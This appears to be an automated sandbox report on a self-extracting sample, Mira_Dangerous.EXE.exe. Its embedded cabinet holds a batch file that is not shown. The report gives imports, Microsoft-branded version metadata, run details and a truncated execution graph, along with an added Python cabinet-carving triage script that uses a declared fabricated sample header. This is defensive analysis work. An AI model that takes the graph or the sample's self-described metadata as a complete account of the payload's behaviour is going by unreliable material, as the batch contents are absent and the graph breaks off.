RT_RCDATA | 0x29870 | 0xae3 | Microsoft Cabinet archive data, Windows 2000/XP setup, 2787 bytes, 1 file, at 0x2c +A "MIRA_D~1.BAT", ID 896, number 1, 1 datablock, 0x1503 compression | 1.00394689630427
RT_RCDATA | 0x2a354 | 0x4 | data | 3.0
RT_RCDATA | 0x2a358 | 0x24 | data | 0.7222222222222222
RT_RCDATA | 0x2a37c | 0x95 | ASCII text, with no line terminators | 0.7785234899328859
RT_RCDATA | 0x2a414 | 0x7 | ASCII text, with no line terminators | 2.142857142857143
RT_RCDATA | 0x2a41c | 0x4 | data | 3.0
RT_RCDATA | 0x2a420 | 0x7 | ASCII text, with no line terminators | 2.142857142857143
RT_RCDATA | 0x2a428 | 0x4 | data | 3.0
RT_RCDATA | 0x2a42c | 0xd | ASCII text, with no line terminators | 1.6153846153846154
RT_RCDATA | 0x2a43c | 0x4 | data | 3.0
RT_RCDATA | 0x2a440 | 0x5 | ASCII text, with no line terminators | 2.6
RT_RCDATA | 0x2a448 | 0x32 | data | 1.02
RT_RCDATA | 0x2a47c | 0x7 | ASCII text, with no line terminators | 2.142857142857143
RT_GROUP_ICON | 0x2a484 | 0xbc | data | 0.6117021276595744
RT_VERSION | 0x2a540 | 0x408 | data | 0.42151162790697677
RT_MANIFEST | 0x2a948 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | 0.37734915924826906
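The payload of this package is the RT_RCDATA cabinet at RVA 0x29870 (2787 bytes, one LZX-compressed file named MIRA_D~1.BAT), and the quickest way to inventory such a package without running it is to carve every MSCF header out of the file and read its directory. As an added example (not code from Joe Sandbox or from the sample), the following Python does exactly that: it implements only the public CAB header layout (CFHEADER, CFFOLDER, CFFILE) and decodes the compression word, file attributes and DOS timestamps. The sample bytes are a constructed header-only cabinet whose fields mirror the report's values (2787-byte cabinet, set ID 896, one LZX folder, one 11542-byte file with the archive bit); they are not data copied from the sample, and the date they carry is made up.

```python
"""Carve Microsoft Cabinet (MSCF) archives out of a byte blob and list their
CFFILE entries.  Added triage example; not code from Joe Sandbox or from the
sample.  Only the public CAB header layout (CFHEADER, CFFOLDER, CFFILE) is
implemented; compressed data blocks are located but not decoded."""
import struct
import sys

CFHDR_PREV_CABINET, CFHDR_NEXT_CABINET, CFHDR_RESERVE_PRESENT = 0x0001, 0x0002, 0x0004
COMPRESSION_NAMES = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}
ATTRIB_BITS = ((0x01, "R"), (0x02, "H"), (0x04, "S"), (0x20, "A"), (0x40, "X"))


def _dos_datetime(date, time):
    """Decode the DOS-style date and time words of a CFFILE entry."""
    year, month, day = 1980 + (date >> 9), (date >> 5) & 0xF, date & 0x1F
    hour, minute, second = time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2
    return f"{year:04d}-{month:02d}-{day:02d} {hour:02d}:{minute:02d}:{second:02d}"


def _compression(type_compress):
    """Low nibble is the algorithm; for LZX bits 8..12 hold the window exponent."""
    name = COMPRESSION_NAMES.get(type_compress & 0x000F, "unknown")
    if name == "LZX":
        name += f" (window 2^{(type_compress >> 8) & 0x1F})"
    return name


def _skip_cstrings(buf, pos, count):
    """Step over `count` NUL-terminated strings; -1 if the buffer ends first."""
    for _ in range(count):
        end = buf.find(b"\0", pos)
        if end == -1:
            return -1
        pos = end + 1
    return pos


def parse_cab(buf, off):
    """Parse the cabinet whose CFHEADER starts at buf[off]; None if implausible."""
    if buf[off:off + 4] != b"MSCF" or len(buf) < off + 36:
        return None
    (cb_cabinet, coff_files, minor, major, c_folders, c_files, flags,
     set_id, i_cabinet) = struct.unpack_from("<4xI4xI4xBBHHHHH", buf, off + 4)
    if major != 1 or c_folders == 0 or not 36 <= coff_files < cb_cabinet:
        return None  # a stray "MSCF" string, not a header
    pos, folder_reserve = off + 36, 0
    if flags & CFHDR_RESERVE_PRESENT:  # optional per-header reserve block
        cb_header, folder_reserve = struct.unpack_from("<HBx", buf, pos)
        pos += 4 + cb_header
    pos = _skip_cstrings(buf, pos, 2 * bool(flags & CFHDR_PREV_CABINET)
                         + 2 * bool(flags & CFHDR_NEXT_CABINET))
    folders = []
    for _ in range(c_folders):
        if pos < 0 or pos + 8 > len(buf):
            return None
        data_off, n_blocks, type_compress = struct.unpack_from("<IHH", buf, pos)
        folders.append({"data_offset": data_off, "blocks": n_blocks,
                        "compression": _compression(type_compress)})
        pos += 8 + folder_reserve
    files, pos = [], off + coff_files
    for _ in range(c_files):
        if pos + 16 > len(buf):
            break  # directory cut off: report what survived
        size, _folder_off, i_folder, date, time, attribs = struct.unpack_from("<IIHHHH", buf, pos)
        end = buf.find(b"\0", pos + 16)
        if end == -1:
            break
        name = buf[pos + 16:end].decode("utf-8" if attribs & 0x80 else "latin-1", "replace")
        files.append({"name": name, "size": size, "folder": i_folder,
                      "attribs": "".join(l for bit, l in ATTRIB_BITS if attribs & bit),
                      "modified": _dos_datetime(date, time)})
        pos = end + 1
    return {"offset": off, "cabinet_size": cb_cabinet, "set_id": set_id,
            "cabinet_index": i_cabinet, "version": f"{major}.{minor}",
            "folders": folders, "files": files,
            "truncated": off + cb_cabinet > len(buf)}


def carve_cabs(buf):
    """Return a parsed record for every plausible cabinet embedded in buf."""
    found, pos = [], buf.find(b"MSCF")
    while pos != -1:
        cab = parse_cab(buf, pos)
        if cab:
            found.append(cab)
        pos = buf.find(b"MSCF", pos + 4)
    return found


def build_sample_cab():
    """Constructed header-only cabinet mirroring the report's resource fields
    (2787 bytes claimed, set ID 896, one LZX folder, one file MIRA_D~1.BAT of
    11542 bytes with the archive bit).  Not bytes taken from the sample."""
    cffile = struct.pack("<IIHHHH", 11542, 0, 0, 0x5A95, 0x5CA0, 0x20) + b"MIRA_D~1.BAT\0"
    cffolder = struct.pack("<IHH", 0x2C + len(cffile), 1, 0x1503)
    cfheader = b"MSCF" + struct.pack("<IIIIIBBHHHHH", 0, 2787, 0, 0x2C, 0, 3, 1, 1, 1, 0, 896, 0)
    return cfheader + cffolder + cffile


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else b"MZ" + bytes(64) + build_sample_cab()
    for cab in carve_cabs(blob):
        print(f"cabinet at 0x{cab['offset']:x}: {cab['cabinet_size']} bytes, set {cab['set_id']}, "
              f"truncated={cab['truncated']}")
        for f in cab["files"]:
            comp = cab["folders"][f["folder"]]["compression"] if f["folder"] < len(cab["folders"]) else "continued"
            print(f"  {f['name']:<16} {f['size']:>8} {f['attribs']:<4} {f['modified']}  via {comp}")
```

Run it against the extractor itself (python carve_cab.py Mira_Dangerous.EXE.exe, path assumed) and the only cabinet found should be the one the resource table lists, with its single MIRA_D~1.BAT entry; the truncated flag matters when carving from memory dumps, where a cabinet header often survives without its data blocks, as the constructed sample deliberately demonstrates.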
Imports

ADVAPI32.dll: GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll: _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll: GetDeviceCaps
USER32.dll: ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll: ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll: (no named imports listed)
Cabinet.dll: (no named imports listed)
VERSION.dll: VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
Description / Data
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.19041.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: Microsoft Corporation. All rights reserved.
OriginalFilename: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.19041.1
Translation: 0x0409 0x04b0
Language of compilation system: English
Country where language is spoken: United States
No network behavior found
Process behavior distribution: File, Registry

Target ID:0
Start time:23:30:09
Start date:20/04/2025
Path:C:\Users\user\Desktop\Mira_Dangerous.EXE.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\Mira_Dangerous.EXE.exe"
Imagebase:0x7ff7a8cc0000
File size:160'256 bytes
MD5 hash:12BD30174702410955D46C23054A0FE6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Execution Graph

Execution Coverage:29.4%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:41.5%
Total number of Nodes:915
Total number of Limit Nodes:21
execution_graph 2066 7ff7a8cc58b0 2067 7ff7a8cc5904 2066->2067 2068 7ff7a8cc58ee 2066->2068 2071 7ff7a8cc5a29 2067->2071 2073 7ff7a8cc58fc 2067->2073 2076 7ff7a8cc591a 2067->2076 2069 7ff7a8cc5770 CloseHandle 2068->2069 2068->2073 2069->2073 2074 7ff7a8cc5a35 SetDlgItemTextA 2071->2074 2075 7ff7a8cc5a4a 2071->2075 2122 7ff7a8cc8470 2073->2122 2074->2075 2075->2073 2094 7ff7a8cc51bc GetFileAttributesA 2075->2094 2076->2073 2077 7ff7a8cc5982 DosDateTimeToFileTime 2076->2077 2077->2073 2079 7ff7a8cc59a3 LocalFileTimeToFileTime 2077->2079 2079->2073 2081 7ff7a8cc59c1 SetFileTime 2079->2081 2081->2073 2082 7ff7a8cc59e9 2081->2082 2091 7ff7a8cc5770 2082->2091 2087 7ff7a8cc5ac1 2113 7ff7a8cc527c LocalAlloc 2087->2113 2090 7ff7a8cc5acb 2090->2073 2092 7ff7a8cc57a4 CloseHandle 2091->2092 2093 7ff7a8cc578f SetFileAttributesA 2091->2093 2092->2093 2093->2073 2095 7ff7a8cc51de 2094->2095 2097 7ff7a8cc525f 2094->2097 2096 7ff7a8cc5246 SetFileAttributesA 2095->2096 2095->2097 2130 7ff7a8cc7ac8 FindResourceA 2095->2130 2096->2097 2097->2073 2101 7ff7a8cc5380 2097->2101 2100 7ff7a8cc523c 2100->2096 2102 7ff7a8cc53b3 2101->2102 2103 7ff7a8cc53d0 2102->2103 2104 7ff7a8cc53fd lstrcmpA 2102->2104 2105 7ff7a8cc4dcc 24 API calls 2103->2105 2106 7ff7a8cc53f4 2104->2106 2107 7ff7a8cc5454 2104->2107 2105->2106 2106->2073 2106->2087 2107->2106 2108 7ff7a8cc54a8 CreateFileA 2107->2108 2108->2106 2110 7ff7a8cc54de 2108->2110 2109 7ff7a8cc5561 CreateFileA 2109->2106 2110->2106 2110->2109 2111 7ff7a8cc5549 CharNextA 2110->2111 2112 7ff7a8cc5532 CreateDirectoryA 2110->2112 2111->2110 2112->2111 2114 7ff7a8cc52aa 2113->2114 2116 7ff7a8cc52d4 2113->2116 2115 7ff7a8cc4dcc 24 API calls 2114->2115 2117 7ff7a8cc52cd 2115->2117 2116->2116 2118 7ff7a8cc52e4 LocalAlloc 2116->2118 2117->2090 2118->2117 2119 7ff7a8cc5300 2118->2119 2120 7ff7a8cc4dcc 24 API calls 2119->2120 2121 7ff7a8cc5323 LocalFree 2120->2121 2121->2117 2123 7ff7a8cc8479 2122->2123 2124 7ff7a8cc5af4 2123->2124 2125 7ff7a8cc84d0 
RtlCaptureContext RtlLookupFunctionEntry 2123->2125 2126 7ff7a8cc8515 RtlVirtualUnwind 2125->2126 2127 7ff7a8cc8557 2125->2127 2126->2127 2185 7ff7a8cc8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2127->2185 2131 7ff7a8cc7b63 2130->2131 2132 7ff7a8cc7b03 LoadResource 2130->2132 2137 7ff7a8cc4dcc 2131->2137 2132->2131 2134 7ff7a8cc7b1d DialogBoxIndirectParamA FreeResource 2132->2134 2134->2131 2135 7ff7a8cc5228 2134->2135 2135->2096 2135->2097 2135->2100 2138 7ff7a8cc5024 2137->2138 2139 7ff7a8cc4e49 LoadStringA 2137->2139 2142 7ff7a8cc8470 7 API calls 2138->2142 2140 7ff7a8cc4eb5 2139->2140 2141 7ff7a8cc4e73 2139->2141 2144 7ff7a8cc4f31 2140->2144 2152 7ff7a8cc4ec1 LocalAlloc 2140->2152 2143 7ff7a8cc7f04 13 API calls 2141->2143 2145 7ff7a8cc5035 2142->2145 2146 7ff7a8cc4e78 2143->2146 2149 7ff7a8cc4f44 LocalAlloc 2144->2149 2150 7ff7a8cc4f8e LocalAlloc 2144->2150 2145->2135 2147 7ff7a8cc4e81 MessageBoxA 2146->2147 2178 7ff7a8cc7e34 2146->2178 2147->2138 2149->2138 2157 7ff7a8cc4f79 2149->2157 2150->2138 2162 7ff7a8cc4f2c 2150->2162 2152->2138 2156 7ff7a8cc4f14 2152->2156 2155 7ff7a8cc4fbc MessageBeep 2166 7ff7a8cc7f04 2155->2166 2182 7ff7a8cc114c 2156->2182 2160 7ff7a8cc114c _vsnprintf 2157->2160 2160->2162 2162->2155 2163 7ff7a8cc4fdc MessageBoxA LocalFree 2163->2138 2164 7ff7a8cc7e34 2 API calls 2164->2163 2167 7ff7a8cc7f44 GetVersionExA 2166->2167 2168 7ff7a8cc809c 2166->2168 2169 7ff7a8cc8076 2167->2169 2170 7ff7a8cc7f6d 2167->2170 2171 7ff7a8cc8470 7 API calls 2168->2171 2169->2168 2170->2169 2173 7ff7a8cc7f90 GetSystemMetrics 2170->2173 2172 7ff7a8cc4fd3 2171->2172 2172->2163 2172->2164 2173->2169 2174 7ff7a8cc7fa7 RegOpenKeyExA 2173->2174 2174->2169 2175 7ff7a8cc7fdc RegQueryValueExA RegCloseKey 2174->2175 2175->2169 2177 7ff7a8cc8026 2175->2177 2176 7ff7a8cc8065 CharNextA 2176->2177 2177->2169 2177->2176 2179 7ff7a8cc7e5a EnumResourceLanguagesA 2178->2179 2180 7ff7a8cc7edd 2178->2180 2179->2180 2181 
7ff7a8cc7e9f EnumResourceLanguagesA 2179->2181 2180->2147 2181->2180 2183 7ff7a8cc1178 _vsnprintf 2182->2183 2184 7ff7a8cc1199 2182->2184 2183->2184 2184->2162 2186 7ff7a8cc5690 2193 7ff7a8cc3b40 2186->2193 2189 7ff7a8cc56c2 WriteFile 2190 7ff7a8cc56ba 2189->2190 2191 7ff7a8cc56f9 2189->2191 2191->2190 2192 7ff7a8cc5725 SendDlgItemMessageA 2191->2192 2192->2190 2194 7ff7a8cc3b4c MsgWaitForMultipleObjects 2193->2194 2195 7ff7a8cc3be5 2194->2195 2196 7ff7a8cc3b74 PeekMessageA 2194->2196 2195->2189 2195->2190 2196->2194 2197 7ff7a8cc3b99 2196->2197 2197->2194 2197->2195 2198 7ff7a8cc3ba7 DispatchMessageA 2197->2198 2199 7ff7a8cc3bb8 PeekMessageA 2197->2199 2198->2199 2199->2197 2944 7ff7a8cc33f0 2945 7ff7a8cc34ec 2944->2945 2948 7ff7a8cc3402 2944->2948 2946 7ff7a8cc34e5 2945->2946 2947 7ff7a8cc34f5 SendDlgItemMessageA 2945->2947 2947->2946 2949 7ff7a8cc340f 2948->2949 2951 7ff7a8cc3441 GetDesktopWindow 2948->2951 2949->2946 2950 7ff7a8cc3430 EndDialog 2949->2950 2950->2946 2954 7ff7a8cc4c68 6 API calls 2951->2954 2956 7ff7a8cc4d3f SetWindowPos 2954->2956 2957 7ff7a8cc8470 7 API calls 2956->2957 2958 7ff7a8cc3458 6 API calls 2957->2958 2958->2946 2959 7ff7a8cc5870 GlobalAlloc 2960 7ff7a8cc78b0 2961 7ff7a8cc78fd 2960->2961 2962 7ff7a8cc7ba8 CharPrevA 2961->2962 2963 7ff7a8cc7935 CreateFileA 2962->2963 2964 7ff7a8cc7970 2963->2964 2965 7ff7a8cc797e WriteFile 2963->2965 2968 7ff7a8cc8470 7 API calls 2964->2968 2966 7ff7a8cc79a2 CloseHandle 2965->2966 2966->2964 2969 7ff7a8cc79d5 2968->2969 2970 7ff7a8cc4a30 2971 7ff7a8cc4a50 2970->2971 2972 7ff7a8cc4a39 SendMessageA 2970->2972 2972->2971 2973 7ff7a8cc3530 2974 7ff7a8cc3802 EndDialog 2973->2974 2975 7ff7a8cc3557 2973->2975 2976 7ff7a8cc356b 2974->2976 2977 7ff7a8cc3567 2975->2977 2978 7ff7a8cc377e GetDesktopWindow 2975->2978 2977->2976 2981 7ff7a8cc3635 GetDlgItemTextA 2977->2981 2982 7ff7a8cc357b 2977->2982 2979 7ff7a8cc4c68 14 API calls 2978->2979 2980 7ff7a8cc3795 SetWindowTextA SendDlgItemMessageA 2979->2980 2980->2976 
2983 7ff7a8cc37d8 GetDlgItem EnableWindow 2980->2983 2991 7ff7a8cc365e 2981->2991 3007 7ff7a8cc36e9 2981->3007 2984 7ff7a8cc3584 2982->2984 2985 7ff7a8cc3618 EndDialog 2982->2985 2983->2976 2984->2976 2986 7ff7a8cc3591 LoadStringA 2984->2986 2985->2976 2987 7ff7a8cc35de 2986->2987 2988 7ff7a8cc35bd 2986->2988 3010 7ff7a8cc4a60 LoadLibraryA 2987->3010 2993 7ff7a8cc4dcc 24 API calls 2988->2993 2990 7ff7a8cc4dcc 24 API calls 2990->2976 2992 7ff7a8cc3694 GetFileAttributesA 2991->2992 2991->3007 2995 7ff7a8cc36fa 2992->2995 2996 7ff7a8cc36a8 2992->2996 3008 7ff7a8cc35d7 2993->3008 3000 7ff7a8cc7ba8 CharPrevA 2995->3000 2998 7ff7a8cc4dcc 24 API calls 2996->2998 2997 7ff7a8cc35eb SetDlgItemTextA 2997->2976 2997->2988 3001 7ff7a8cc36cb 2998->3001 2999 7ff7a8cc374b EndDialog 2999->2976 3002 7ff7a8cc370e 3000->3002 3001->2976 3003 7ff7a8cc36d4 CreateDirectoryA 3001->3003 3004 7ff7a8cc6b70 31 API calls 3002->3004 3003->2995 3003->3007 3005 7ff7a8cc3716 3004->3005 3006 7ff7a8cc3721 3005->3006 3005->3007 3006->3008 3009 7ff7a8cc6ca4 38 API calls 3006->3009 3007->2990 3008->2976 3008->2999 3009->3008 3011 7ff7a8cc4c20 3010->3011 3012 7ff7a8cc4aa0 GetProcAddress 3010->3012 3016 7ff7a8cc4dcc 24 API calls 3011->3016 3013 7ff7a8cc4ac2 GetProcAddress 3012->3013 3014 7ff7a8cc4c0a FreeLibrary 3012->3014 3013->3014 3015 7ff7a8cc4ae2 GetProcAddress 3013->3015 3014->3011 3015->3014 3017 7ff7a8cc4b04 3015->3017 3018 7ff7a8cc35e3 3016->3018 3019 7ff7a8cc4b13 GetTempPathA 3017->3019 3024 7ff7a8cc4b65 3017->3024 3018->2976 3018->2997 3020 7ff7a8cc4b2b 3019->3020 3020->3020 3021 7ff7a8cc4b34 CharPrevA 3020->3021 3022 7ff7a8cc4b4e CharPrevA 3021->3022 3021->3024 3022->3024 3023 7ff7a8cc4bee FreeLibrary 3023->3018 3024->3023 3025 7ff7a8cc3910 3026 7ff7a8cc3a09 3025->3026 3027 7ff7a8cc3933 3025->3027 3028 7ff7a8cc3b1a EndDialog 3026->3028 3031 7ff7a8cc3954 3026->3031 3027->3026 3029 7ff7a8cc3a11 GetDesktopWindow 3027->3029 3030 7ff7a8cc3948 3027->3030 3028->3031 3032 7ff7a8cc4c68 14 API calls 
3029->3032 3033 7ff7a8cc394c 3030->3033 3034 7ff7a8cc397b 3030->3034 3036 7ff7a8cc3a2f 3032->3036 3033->3031 3037 7ff7a8cc395b TerminateThread 3033->3037 3034->3031 3035 7ff7a8cc3985 ResetEvent 3034->3035 3038 7ff7a8cc4dcc 24 API calls 3035->3038 3039 7ff7a8cc3a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 3036->3039 3040 7ff7a8cc3a9b SetWindowTextA CreateThread 3036->3040 3037->3028 3041 7ff7a8cc39c3 3038->3041 3039->3040 3040->3031 3042 7ff7a8cc3ae8 3040->3042 3043 7ff7a8cc39e4 SetEvent 3041->3043 3045 7ff7a8cc39cc SetEvent 3041->3045 3044 7ff7a8cc4dcc 24 API calls 3042->3044 3046 7ff7a8cc3b40 4 API calls 3043->3046 3044->3026 3045->3031 3046->3026 3047 7ff7a8cc80d0 3049 7ff7a8cc80e2 3047->3049 3054 7ff7a8cc8818 GetModuleHandleW 3049->3054 3050 7ff7a8cc8149 __set_app_type 3051 7ff7a8cc8186 3050->3051 3052 7ff7a8cc818f __setusermatherr 3051->3052 3053 7ff7a8cc819c 3051->3053 3052->3053 3055 7ff7a8cc882d 3054->3055 3055->3050 3056 7ff7a8cc81b0 __getmainargs 3057 7ff7a8cc8b30 _XcptFilter 3058 7ff7a8cc8790 SetUnhandledExceptionFilter 3059 7ff7a8cc8750 3060 7ff7a8cc875f 3059->3060 3061 7ff7a8cc8782 3059->3061 3060->3061 3062 7ff7a8cc877b ?terminate@ 3060->3062 3062->3061 3063 7ff7a8cc57e0 3065 7ff7a8cc581e 3063->3065 3066 7ff7a8cc57fc 3063->3066 3064 7ff7a8cc583d SetFilePointer 3064->3066 3065->3064 3065->3066 3067 7ff7a8cc55e0 3068 7ff7a8cc5641 ReadFile 3067->3068 3069 7ff7a8cc560d 3067->3069 3068->3069 3070 7ff7a8cc33a0 3071 7ff7a8cc33ac 3070->3071 3072 7ff7a8cc33bb CallWindowProcA 3070->3072 3071->3072 3073 7ff7a8cc33b7 3071->3073 3072->3073 3074 7ff7a8cc1500 3075 7ff7a8cc1530 3074->3075 3076 7ff7a8cc1557 GetDesktopWindow 3074->3076 3078 7ff7a8cc1553 3075->3078 3080 7ff7a8cc1542 EndDialog 3075->3080 3077 7ff7a8cc4c68 14 API calls 3076->3077 3079 7ff7a8cc156e LoadStringA SetDlgItemTextA MessageBeep 3077->3079 3081 7ff7a8cc8470 7 API calls 3078->3081 3079->3078 3080->3078 3082 7ff7a8cc15d0 3081->3082 3083 7ff7a8cc3840 3084 7ff7a8cc3852 3083->3084 3085 
7ff7a8cc385a 3083->3085 3084->3085 3087 7ff7a8cc388e GetDesktopWindow 3084->3087 3086 7ff7a8cc38ec EndDialog 3085->3086 3088 7ff7a8cc385f 3085->3088 3086->3088 3089 7ff7a8cc4c68 14 API calls 3087->3089 3090 7ff7a8cc38a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3089->3090 3090->3088 2200 7ff7a8cc8200 2219 7ff7a8cc8964 2200->2219 2204 7ff7a8cc824b 2205 7ff7a8cc825d 2204->2205 2206 7ff7a8cc8277 Sleep 2204->2206 2207 7ff7a8cc826d _amsg_exit 2205->2207 2209 7ff7a8cc8284 2205->2209 2206->2204 2207->2209 2208 7ff7a8cc82fc _initterm 2211 7ff7a8cc8319 _IsNonwritableInCurrentImage 2208->2211 2209->2208 2210 7ff7a8cc82dd 2209->2210 2209->2211 2212 7ff7a8cc83f8 _ismbblead 2211->2212 2213 7ff7a8cc837d 2211->2213 2212->2211 2223 7ff7a8cc2c54 GetVersion 2213->2223 2216 7ff7a8cc83cf 2216->2210 2218 7ff7a8cc83d8 _cexit 2216->2218 2217 7ff7a8cc83c7 exit 2217->2216 2218->2210 2220 7ff7a8cc8209 GetStartupInfoW 2219->2220 2221 7ff7a8cc8990 6 API calls 2219->2221 2220->2204 2222 7ff7a8cc8a0f 2221->2222 2222->2220 2224 7ff7a8cc2cc3 2223->2224 2225 7ff7a8cc2c7b 2223->2225 2245 7ff7a8cc2db4 2224->2245 2225->2224 2226 7ff7a8cc2c7f GetModuleHandleW 2225->2226 2226->2224 2228 7ff7a8cc2c97 GetProcAddress 2226->2228 2228->2224 2230 7ff7a8cc2cb2 2228->2230 2230->2224 2231 7ff7a8cc2d7f 2232 7ff7a8cc2d97 2231->2232 2233 7ff7a8cc2d8b CloseHandle 2231->2233 2232->2216 2232->2217 2233->2232 2238 7ff7a8cc2d29 2238->2231 2239 7ff7a8cc2d59 2238->2239 2241 7ff7a8cc4dcc 24 API calls 2238->2241 2239->2231 2242 7ff7a8cc2d7a 2239->2242 2243 7ff7a8cc2d67 ExitWindowsEx 2239->2243 2241->2239 2360 7ff7a8cc1c0c GetCurrentProcess OpenProcessToken 2242->2360 2243->2231 2246 7ff7a8cc8b09 2245->2246 2247 7ff7a8cc2df9 memset memset 2246->2247 2368 7ff7a8cc5050 FindResourceA SizeofResource 2247->2368 2250 7ff7a8cc2fb5 2253 7ff7a8cc4dcc 24 API calls 2250->2253 2251 7ff7a8cc2e53 CreateEventA SetEvent 2252 7ff7a8cc5050 7 API calls 2251->2252 2254 7ff7a8cc2e92 2252->2254 2260 7ff7a8cc2eb4 2253->2260 2255 
7ff7a8cc2e96 2254->2255 2258 7ff7a8cc2fa3 2254->2258 2259 7ff7a8cc5050 7 API calls 2254->2259 2256 7ff7a8cc4dcc 24 API calls 2255->2256 2256->2260 2257 7ff7a8cc8470 7 API calls 2261 7ff7a8cc2cd4 2257->2261 2373 7ff7a8cc70a8 2258->2373 2263 7ff7a8cc2eec 2259->2263 2260->2257 2261->2231 2290 7ff7a8cc30ec 2261->2290 2263->2255 2265 7ff7a8cc2efe CreateMutexA 2263->2265 2265->2258 2267 7ff7a8cc2f22 GetLastError 2265->2267 2266 7ff7a8cc2fc4 2268 7ff7a8cc2fde FindResourceExA 2266->2268 2269 7ff7a8cc2fcd 2266->2269 2267->2258 2270 7ff7a8cc2f35 2267->2270 2272 7ff7a8cc2fff LoadResource 2268->2272 2273 7ff7a8cc3014 2268->2273 2400 7ff7a8cc204c 2269->2400 2274 7ff7a8cc2f62 2270->2274 2275 7ff7a8cc2f4a 2270->2275 2272->2273 2278 7ff7a8cc3029 2273->2278 2279 7ff7a8cc301d #17 2273->2279 2276 7ff7a8cc4dcc 24 API calls 2274->2276 2277 7ff7a8cc4dcc 24 API calls 2275->2277 2281 7ff7a8cc2f7c 2276->2281 2282 7ff7a8cc2f60 2277->2282 2278->2260 2280 7ff7a8cc303a 2278->2280 2279->2278 2415 7ff7a8cc3bf4 GetVersionExA 2280->2415 2281->2258 2283 7ff7a8cc2f81 CloseHandle 2281->2283 2282->2283 2283->2260 2288 7ff7a8cc7ac8 28 API calls 2289 7ff7a8cc309b 2288->2289 2289->2260 2291 7ff7a8cc3141 2290->2291 2294 7ff7a8cc3116 2290->2294 2524 7ff7a8cc5fe4 2291->2524 2293 7ff7a8cc3134 2675 7ff7a8cc3f74 2293->2675 2294->2293 2505 7ff7a8cc60a4 2294->2505 2299 7ff7a8cc3230 2303 7ff7a8cc8470 7 API calls 2299->2303 2305 7ff7a8cc2ce1 2303->2305 2304 7ff7a8cc315b GetSystemDirectoryA 2306 7ff7a8cc7ba8 CharPrevA 2304->2306 2335 7ff7a8cc61ec 2305->2335 2307 7ff7a8cc3186 LoadLibraryA 2306->2307 2308 7ff7a8cc319f GetProcAddress 2307->2308 2309 7ff7a8cc31c9 FreeLibrary 2307->2309 2308->2309 2312 7ff7a8cc31ba DecryptFileA 2308->2312 2310 7ff7a8cc31e4 2309->2310 2311 7ff7a8cc3273 SetCurrentDirectoryA 2309->2311 2310->2311 2314 7ff7a8cc31f0 GetWindowsDirectoryA 2310->2314 2313 7ff7a8cc320d 2311->2313 2319 7ff7a8cc3291 2311->2319 2312->2309 2317 7ff7a8cc4dcc 24 API calls 2313->2317 2314->2313 2316 7ff7a8cc325a 
